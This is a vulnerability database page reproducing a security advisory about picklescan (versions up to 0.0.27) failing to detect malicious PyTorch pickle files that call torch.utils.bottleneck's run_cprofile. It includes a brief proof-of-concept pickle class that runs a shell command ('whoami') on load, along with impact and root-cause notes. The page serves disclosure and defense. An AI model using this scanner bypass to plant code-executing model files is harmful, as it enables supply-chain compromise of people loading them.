N/A

CVSS Score

Basic Information

CVE ID

GHSA ID

GHSA-4r9r-ch6f-vxmx

EPSS Score

CWE

CWE-345

Published

8/22/2025

Updated

8/22/2025

KEV Status

Technology

Python

Concerned about an active attack path?

Talk to our security experts and see Miggo in action.

Miggo Vulnerability Database

→

GHSA-4r9r-ch6f-vxmx

GHSA-4r9r-ch6f-vxmx: Picklescan missing detection when calling pytorch function torch.utils.bottleneck.main.run_cprofile

Summary

Using torch.utils.bottleneck.main.run_cprofile function, which is a pytorch library function to execute remote pickle file.

Details

The attack payload executes in the following steps:

First, the attacker craft the payload by calling to torch.utils.bottleneck.main.run_cprofile function in reduce method Then when the victim after checking whether the pickle file is safe by using Picklescan library and this library doesn't dectect any dangerous functions, decide to pickle.load() this malicious pickle file, thus lead to remote code execution.

PoC

import torch.utils.bottleneck.__main__ as bottleneck_main

class EvilTorchUtilsBottleneckRunCprofile:
    def __reduce__(self):
        code = '__import__("os").system("whoami")'
        globs = {}
        return bottleneck_main.run_cprofile, (code, globs)

Impact

Who is impacted? Any organization or individual relying on picklescan to detect malicious pickle files inside PyTorch models. What is the impact? Attackers can embed malicious code in pickle file that remains undetected but executes when the pickle file is loaded. Supply Chain Attack: Attackers can distribute infected pickle files across ML models, APIs, or saved Python objects.

Corresponding

https://github.com/FredericDT https://github.com/Qhaoduoyu

(GitHub Advisory)

N/A

CVSS Score

Basic Information

CVE ID

GHSA ID

GHSA-4r9r-ch6f-vxmx

EPSS Score

CWE

CWE-345

Published

8/22/2025

Updated

8/22/2025

KEV Status

Technology

Python

Technical Details

CVSS Vector

Package Name	Ecosystem	Vulnerable Versions	First Patched Version
picklescan	pip	<= 0.0.27	0.0.28

Vulnerability Intelligence
Miggo AI

Root Cause Analysis

The vulnerability is a bypass of the picklescan library, allowing a malicious pickle file to go undetected. The root cause is that picklescan's denylist of dangerous functions was incomplete. An attacker could craft a pickle file that uses functions from the PyTorch library, such as torch.utils.bottleneck.__main__.run_cprofile, to execute arbitrary code. The provided patch addresses this by adding several PyTorch functions to the denylist in src/picklescan/scanner.py. The functions identified as vulnerable are those that were added to the _unsafe_globals dictionary in the patch. These functions would appear in a runtime profile if a malicious pickle file exploiting this vulnerability were to be loaded. The analysis of the patch file provides high confidence in these findings, as the changes are explicitly aimed at mitigating this vulnerability.

Vulnerable functions

Only Mi**o us*rs **n s** t*is s**tion

WAF Protection Rules

WAF Rule

### Summ*ry Usin* tor**.utils.*ottl*n**k.__m*in__.run_*pro*il* *un*tion, w*i** is * pytor** li*r*ry *un*tion to *x**ut* r*mot* pi*kl* *il*. ### **t*ils T** *tt**k p*ylo** *x**ut*s in t** *ollowin* st*ps: *irst, t** *tt**k*r *r**t t** p*ylo** *y

Reasoning

T** vuln*r**ility is * *yp*ss o* t** pi*kl*s**n li*r*ry, *llowin* * m*li*ious pi*kl* *il* to *o un**t**t**. T** root **us* is t**t pi*kl*s**n's **nylist o* **n**rous *un*tions w*s in*ompl*t*. *n *tt**k*r *oul* *r**t * pi*kl* *il* t**t us*s *un*tions

N/A

Basic Information

Concerned about an active attack path?

GHSA-4r9r-ch6f-vxmx: Picklescan missing detection when calling pytorch function torch.utils.bottleneck.__main__.run_cprofile

Summary

Details

PoC

Impact

Corresponding

N/A

Basic Information

Technical Details

Vulnerability IntelligenceMiggo AI

Root Cause Analysis

Vulnerable functions

WAF Protection Rules

WAF Rule

Reasoning

GHSA-4r9r-ch6f-vxmx: Picklescan missing detection when calling pytorch function torch.utils.bottleneck.main.run_cprofile

Vulnerability Intelligence
Miggo AI